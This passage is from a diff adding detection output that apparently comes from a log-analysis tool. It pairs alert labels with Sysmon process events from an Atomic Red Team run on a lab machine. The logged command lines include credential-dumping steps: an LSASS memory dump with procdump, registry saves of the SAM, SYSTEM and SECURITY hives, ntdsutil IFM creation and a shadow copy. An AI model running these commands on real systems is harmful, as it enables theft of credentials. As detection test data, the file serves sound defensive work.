+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:26.958</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00100C3F4B00</Data>
+    <Data Name=""ProcessId"">5036</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;vssadmin.exe create shadow /for=C:&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549086.971596,2019-07-19T19:11:26.971596+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:26.884595Z"">
+    </TimeCreated>
+    <EventRecordID>4127</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:26.875</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00106D3A4B00</Data>
+    <Data Name=""ProcessId"">4208</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549086.884595,2019-07-19T19:11:26.884595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:26.852817Z"">
+    </TimeCreated>
+    <EventRecordID>4126</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:26.845</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-001059374B00</Data>
+    <Data Name=""ProcessId"">584</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549086.852817,2019-07-19T19:11:26.852817+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:26.686585Z"">
+    </TimeCreated>
+    <EventRecordID>4125</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:26.673</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00109A2F4B00</Data>
+    <Data Name=""ProcessId"">264</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp&quot; ) contain suspicious command ( procdump.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:26.642464Z"">
+    </TimeCreated>
+    <EventRecordID>4124</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:26.626</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00106E2C4B00</Data>
+    <Data Name=""ProcessId"">5488</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:26.642464Z"">
+    </TimeCreated>
+    <EventRecordID>4124</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:26.626</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00106E2C4B00</Data>
+    <Data Name=""ProcessId"">5488</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549086.642464,2019-07-19T19:11:26.642464+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:26.549874Z"">
+    </TimeCreated>
+    <EventRecordID>4123</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:26.535</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-0010CB274B00</Data>
+    <Data Name=""ProcessId"">3016</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549083.336763,2019-07-19T19:11:23.336763+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\security security&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:23.317303Z"">
+    </TimeCreated>
+    <EventRecordID>4121</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:23.302</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD9B-5D31-0000-00106C1C4B00</Data>
+    <Data Name=""ProcessId"">7164</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\security security&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549081.105496,2019-07-19T19:11:21.105496+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\system system&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:21.090401Z"">
+    </TimeCreated>
+    <EventRecordID>4119</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:21.069</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD99-5D31-0000-001069A34A00</Data>
+    <Data Name=""ProcessId"">4080</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\system system&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549077.243643,2019-07-19T19:11:17.243643+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\sam sam&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:17.224751Z"">
+    </TimeCreated>
+    <EventRecordID>4117</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:17.211</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-001075964A00</Data>
+    <Data Name=""ProcessId"">7140</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\sam sam&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549077.224751,2019-07-19T19:11:17.224751+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:17.149274Z"">
+    </TimeCreated>
+    <EventRecordID>4116</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:17.139</Data>
